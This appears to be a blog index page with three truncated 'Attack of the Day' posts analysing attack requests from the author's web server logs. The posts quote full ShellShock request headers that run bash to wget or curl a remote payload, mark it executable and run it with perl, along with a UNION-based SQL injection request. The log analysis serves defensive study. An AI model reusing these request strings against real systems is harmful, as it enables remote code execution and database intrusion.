Statistics..

Posted Posted in Attack of the Day

Break out your text books, kids.  Today we’re going to talk about statistics..  Well, more like “counting with graphs” but whatever.. Couple of point on the data presented below.  First, it is very common to see a single request violate several rules.  Take this request, for instance. GET /cgi-bin/bts.cgi HTTP/1.0 Host: 69.44.4.28 User-Agent: () { :;}; /bin/bash -c “cd /tmp;wget http://100.42.30.34/lex ; curl -O http://100.42.30.34/lex ; perl lex ;rm -rf lex” Connection: Keep-Alive X-Forwarded-For: 72.9.231.226 X_FORWARDED_PROTO: https There’s so much wrong with this, I’m not sure where to start. Signature violations, […]

We Call Him “Little Bobby Tables”

Posted 1 CommentPosted in Attack of the Day

Every time someone makes a reference to SQL Injection, I think of this xkcd cartoon: WOOT Actually, w00t will be a different day..  Today is all about SQL Injections.  These kinds of things show up in the logs all the time.  Almost as frequently as the ShellShock folks, far more frequently than people that donate code via ShellShock.  I digress.. GET /index.php?option=com_hdflvplayer&id=1+AND+1=2+UNION+SELECT+concat%2812,0x3a,32%29,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21– HTTP/1.0 Host: planetspork.com X-Cnection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0 X-Forwarded-For: 109.201.154.143 Looking at the “GET” portion of the request, it’s pretty easy to […]

Shh.. Be very, very Quiet. We’re Hunting Rabbits

Posted Leave a commentPosted in Attack of the Day

** Standard Warnings Apply ** Let me help you understand.. When this rolled in today I was thinking, “Oh, another shellshock attempt.  I wonder which code base they’ll be attempting to deliver today?”  I wouldn’t have even posted this weren’t it for the payload contained at the other end of this URL. GET / HTTP/1.0 Host: www.planetspork.com Accept-Encoding: identity Referer: () { ignored;};/bin/bash -c ‘wget http://www.ossrc.com/phpfmg/leg -O /tmp/.go;chmod +x /tmp/.go;perl /tmp/.go’ Cookie: () { ignored;};/bin/bash -c ‘wget http://www.ossrc.com/phpfmg/leg -O /tmp/.go;chmod +x /tmp/.go;perl /tmp/.go’ Content-type: application/x-www-form-urlencoded X-Forwarded-For: 173.15.11.25 Once opened, I […]